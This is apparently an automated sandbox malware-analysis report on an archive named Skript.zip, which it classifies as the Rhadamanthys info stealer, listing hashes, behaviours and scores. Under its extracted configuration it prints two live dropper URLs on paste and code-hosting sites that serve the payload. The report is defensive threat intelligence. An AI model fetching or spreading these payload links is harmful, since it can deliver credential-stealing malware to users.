Overview

overview

10

Static

static

3

Launcher.exe

windows7-x64

10

Launcher.exe

windows10-2004-x64

10

dxil.dll

windows10-2004-x64

1

mojo_core.dll

windows7-x64

1

mojo_core.dll

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Skript.zip

  • Size

    1.5MB

  • Sample

    240622-1d2rtavdpg

  • MD5

    986fd66f8c320eebe167f8a9521314a8

  • SHA1

    9e3667ba7755e4db66f99586556f75697ad3a17e

  • SHA256

    a7edd49ec36552504d0b7940037e79de8f9918e0271ba96bad47076cb24f7ee1

  • SHA512

    808eade52347e0c52b43e44934cb793d7310de773bfc5e3e3aea3164c99e33fc30af2c55b98471324cc6f1c5c107eb0995637e14700b1361a422befe63beea09

  • SSDEEP

    49152:yDfI3cSHjRIA9pX8wgibL6Jt1xH6tUhhCF:yDfRyb52JjxH2F

Score
10/10
rhadamanthysevasionexecutionpersistencestealer

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Targets

    • Target

      Launcher.exe

    • Size

      7KB

    • MD5

      b5e479d3926b22b59926050c29c4e761

    • SHA1

      a456cc6993d12abe6c44f2d453d7ae5da2029e24

    • SHA256

      fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

    • SHA512

      09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

    • SSDEEP

      192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

    Score
    10/10
    executionrhadamanthysevasionpersistencestealer

    • Rhadamanthys

      Rhadamanthys is an info stealer written in C++ first seen in August 2022.

      stealerrhadamanthys

    • Suspicious use of NtCreateProcessExOtherParentProcess

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Creates new service(s)

      persistenceexecution

    • Downloads MZ/PE file

    • Stops running service(s)

      evasionexecution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Power Settings

      powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

      persistence

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

    • Target

      dxil.dll

    • Size

      1.4MB

    • MD5

      cb72bef6ce55aa7c9e3a09bd105dca33

    • SHA1

      d48336e1c8215ccf71a758f2ff7e5913342ea229

    • SHA256

      47ffdbd85438891b7963408ea26151ba26ae1b303bbdab3a55f0f11056085893

    • SHA512

      c89eebcf43196f8660eee19ca41cc60c2a00d93f4b3bf118fe7a0deccb3f831cac0db04b2f0c5590fa8d388eb1877a3706ba0d58c7a4e38507c6e64cfd6a50a0

    • SSDEEP

      24576:LCfhbh3v3mtZDiAQeWj26k41ob2nrZ1rqpegQDJqoZtp22GkmgA9u808jQPEdkr1:LCfhbh3v3mtEAQrW41obCraeRhy9ou6r

    Score
    1/10
    behavioral3

    • Target

      mojo_core.dll

    • Size

      1.9MB

    • MD5

      e338245ec63c4881d446e81bf2e6b9be

    • SHA1

      9ed5ff2c4bbb43a41fed37a65f5b691ddcbc63b0

    • SHA256

      c8f24b72f72aeacd060e67a76a5c71145cde5b4527b3ec87c5c4d36cae8e076e

    • SHA512

      f3768a97f646e31fd2206bc658a24e4f39f18a4a625699d700d43a27299a946840e404df78b0e0f149c9a013a7e60dd5adaf452c4a0a4db5525ad738e4c22798

    • SSDEEP

      49152:XN5EwqPeGTxMdbqDb0fmKMEYcwYj75Bvaw:PIabqDEMEd

    Score
    1/10
    behavioral4behavioral5

MITRE ATT&CK Matrix

Tasks